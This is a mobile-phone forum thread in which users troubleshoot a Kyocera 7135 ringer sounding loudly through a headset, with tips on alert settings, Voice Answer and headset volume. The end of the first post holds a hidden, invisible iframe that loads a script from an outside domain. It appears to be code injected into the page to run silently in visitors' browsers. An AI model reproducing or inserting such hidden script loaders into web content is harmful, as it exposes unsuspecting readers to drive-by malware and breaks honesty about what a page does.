+ Reply to Thread
Results 1 to 17 of 17
  1. #1
    Registered User
    Join Date
    09-18-2002
    Posts
    20

    Ringer comes through headset

    My ringer comes through the headset. The extremely loud sound scares the hell out of me when driving :eyecrazy, not to mention leaving me deaf for a few moments.

    Under phone prefs > Accessories, I have toggled the "Play alert through speaker when headset is plugged in", but the ringer still comes through the headset.

    Has anyone else experienced this or know of a way around it? Am I missing something? Thoughts, comments?

    I am using the Kyocera stereo headset.

    BTW, I searched the threads before posting this without finding a similar complaint, but I appologize in advance if this issue has already been addressed.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

  2. #2
    Registered User
    Join Date
    10-22-2002
    Posts
    120

    Re: Ringer comes through headset

    Originally posted by Trey
    My ringer comes through the headset. The extremely loud sound scares the hell out of me when driving :eyecrazy, not to mention leaving me deaf for a few moments.
    What happens when you put the phone in vibrate mode?
    If at first you don't succeed, don't try sky diving.

  3. #3
    Registered User
    Join Date
    09-18-2002
    Posts
    20

    Vibrate

    Yeah, putting it in vibrate works, but I seem to forget to do so, until I get my eardrum blown out. Of course, this problem isn't a big deal. I'd like for it to work as designed and am just curious if I am missing something or if others have the same problem.

    Another note. I carry my phone in the hospital where I work. I don't want to be notified for an incoming call, but I'd like notification for a text message. In other words, I'd like to set the phone to not ring OR vibrate when a call comes in, but do vibrate or beep when a message comes in. I guess I could create a ringer, call it "Silent", that is just a blank MP3 tune. Thoughts?

  4. #4
    Techguru alanb's Avatar
    Join Date
    10-30-2002
    Location
    dc-baltimore megalopolis
    Posts
    2,184
    I think you will find that it is ringing on the phone AND on the headset. When you uncheck "Play Alert through Speaker..." then it ONLY plays through the headset.

    I hadn't noticed this at first since I am using the Jabra bluetooth headset and my headset is off until the phone rings, but if I was listening to MP3's, I could see this as an issue. You might want to adjust the volume of the MP3 you are using as a ringer so it isn't deafeningly loud....

    Alan

  5. #5
    Registered User
    Join Date
    11-04-2003
    Location
    Austin TX
    Posts
    84

    Re: Ringer comes through headset

    Originally posted by Trey
    My ringer comes through the headset. The extremely loud sound scares the hell out of me when driving :eyecrazy, not to mention leaving me deaf for a few moments.

    Under phone prefs > Accessories, I have toggled the "Play alert through speaker when headset is plugged in", but the ringer still comes through the headset.

    Has anyone else experienced this or know of a way around it? Am I missing something? Thoughts, comments?

    I am using the Kyocera stereo headset.

    BTW, I searched the threads before posting this without finding a similar complaint, but I appologize in advance if this issue has already been addressed.
    I get a normal volume with the headset and incoming call. I'm still using the Kyocera standard ringtone.

  6. #6
    Registered User
    Join Date
    10-05-2002
    Posts
    97

    Re: Ringer comes through headset

    Trey:

    Originally posted by Trey
    My ringer comes through the headset. The extremely loud sound scares the hell out of me when driving :eyecrazy, not to mention leaving me deaf for a few moments.

    Under phone prefs > Accessories, I have toggled the "Play alert through speaker when headset is plugged in", but the ringer still comes through the headset.

    Has anyone else experienced this or know of a way around it? Am I missing something? Thoughts, comments?

    I am using the Kyocera stereo headset.

    BTW, I searched the threads before posting this without finding a similar complaint, but I appologize in advance if this issue has already been addressed.
    FYI although I have Headset Volume set to "7" (Max), it isn't THAT loud.

    HOWEVER ... there IS somewhat of a "workaround" -- although NOT a "silent" workaround ...

    ... under the Voice Dialing pref, check ON "Voice Answer". THEN, when a call comes in, instead of a ring, you'll get a voice that says "Incoming call ... answer?"

    IF you've trained Voice Dialing, then you COULD answer the phone without opening the flip. BUT ... you still CAN answer the phone by pressing "Send".

    That voice will play twice -- but THEN it will revert to a ringer. At least THIS way, you get a softer "heads-up" before the loud ringer kicks in.

    Hope this works for you!

  7. #7
    Registered User Steve's Avatar
    Join Date
    10-02-2002
    Posts
    1,694

    Re: Ringer comes through headset

    Originally posted by Trey
    My ringer comes through the headset. The extremely loud sound scares the hell out of me when driving :eyecrazy, not to mention leaving me deaf for a few moments.

    Under phone prefs > Accessories, I have toggled the "Play alert through speaker when headset is plugged in", but the ringer still comes through the headset.

    Has anyone else experienced this or know of a way around it? Am I missing something? Thoughts, comments?

    I am using the Kyocera stereo headset.

    BTW, I searched the threads before posting this without finding a similar complaint, but I appologize in advance if this issue has already been addressed.
    Maybe the "alert" they are talking about is the sms/datebook alerts and has nothing to do with the ringer.
    iPhone therefore iAm.

  8. #8
    Techguru alanb's Avatar
    Join Date
    10-30-2002
    Location
    dc-baltimore megalopolis
    Posts
    2,184

    Re: Re: Ringer comes through headset

    Originally posted by Steve
    Maybe the "alert" they are talking about is the sms/datebook alerts and has nothing to do with the ringer.
    I answered this an hour ago.... With it checked, BOTH the headset and the phone ring. With it unchecked ONLY the headset rings.

    Alan

  9. #9
    Registered User
    Join Date
    09-18-2002
    Posts
    20
    Thanks to you all. That cleared things up. Per Otter's suggestion, I used "Voice Answer."

    I also made a ringer entitled "Silence" which is good for the work environment I eluded to earlier.

    alanb and Steve, thanks for clearing up the definitions. Don't you think, though, that the option should be, "Rings not through headset"?

  10. #10
    Registered User
    Join Date
    03-07-2002
    Posts
    983
    Can someone give me a little primer on Voice Answer? On the 6035 I thought that was only functional when the car kit was active. Can you answer the 7135 when its sitting on a desk, clamshell closed, just by saying "ANSWER THE PHONE!!" ?

  11. #11
    Techguru alanb's Avatar
    Join Date
    10-30-2002
    Location
    dc-baltimore megalopolis
    Posts
    2,184
    Originally posted by jazmaan
    Can someone give me a little primer on Voice Answer? On the 6035 I thought that was only functional when the car kit was active. Can you answer the 7135 when its sitting on a desk, clamshell closed, just by saying "ANSWER THE PHONE!!" ?
    Only if you have a headset plugged in while it is sitting on the desk

    It works when either plugged into the car kit or when a headset is plugged in.

    Alan

  12. #12
    Registered User
    Join Date
    10-05-2002
    Posts
    97
    Jaz:

    Originally posted by jazmaan
    Can someone give me a little primer on Voice Answer? On the 6035 I thought that was only functional when the car kit was active. Can you answer the 7135 when its sitting on a desk, clamshell closed, just by saying "ANSWER THE PHONE!!" ?
    I see that Alan answered your main question.

    However, I'd also like to add that while "Voice Answer" works only with a headset plugged in -- Voice Dialing DOES work on speakerphone WITHOUT a headset (I believe the same was true for the 6035, but I never owned one myself).

  13. #13
    PPC6800 OWNER (ALLTEL SERVICE) GREGHARKINS's Avatar
    Join Date
    09-29-2003
    Location
    ST. ALBANS, WV
    Posts
    891

    ear piece volume

    You can turn down the headset volume independent of the rest of the settings. This will solve the loud ringer in the ear and will also allow you not to have to use voice answer, although it is a great feature that i use all the time.

    Phone Prefs, Call Volume and there are the settings you need to change the volumes.
    GREG HARKINS
    GREGHARKINS@BRINGINGFUNTOYOU.COM
    www.bringingfuntoyou.com

  14. #14
    Moddin' & Poddin' Markito's Avatar
    Join Date
    05-04-2001
    Posts
    3,914
    I like that "Silence" Mp3 idea. Very clever!
    ~'kito
    pdaPhoneHome Moderator

  15. #15
    AJR
    AJR is offline
    Registered User
    Join Date
    04-04-2003
    Posts
    64

    How do you get the phone to ring with a headset?

    I got my phone Tuesday, and I'm loving it... definetely worth it. I'm just a little perplexed with a few things that are different from the 6035.

    The biggest thing is when the flip is closed and in the holster, I always have a headset hooked into the jack. I don't always have the earbud in my ear, and I have realized that if a call comes in, the voice prompt comes over the earpiece saying "Incoming call, do you want to answer?" (which is really cool and works well), but there is no ring/vibrate associated with this message. So if you don't have the earbud in your ear, you don't know a call is coming in. Is there any way to change this?

    I'll post my other questions when I return. Any help on the above issue would be great.

    Thanks,
    AJ

  16. #16
    Registered User
    Join Date
    02-24-2003
    Posts
    5
    I believe if you go to Phone Prefs > Accessories menu

    Check "Play alert through speaker when headset is plugged in"

    HTH

  17. #17
    Techguru alanb's Avatar
    Join Date
    10-30-2002
    Location
    dc-baltimore megalopolis
    Posts
    2,184
    Originally posted by WebberOne
    I believe if you go to Phone Prefs > Accessories menu

    Check "Play alert through speaker when headset is plugged in"

    HTH
    Correct, but if you have voice answer enabled, it will still prompt twice in the headset before it starts to ring externally. OK, just gives you a little less time to answer once you hear the ringing start.

    Alan

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts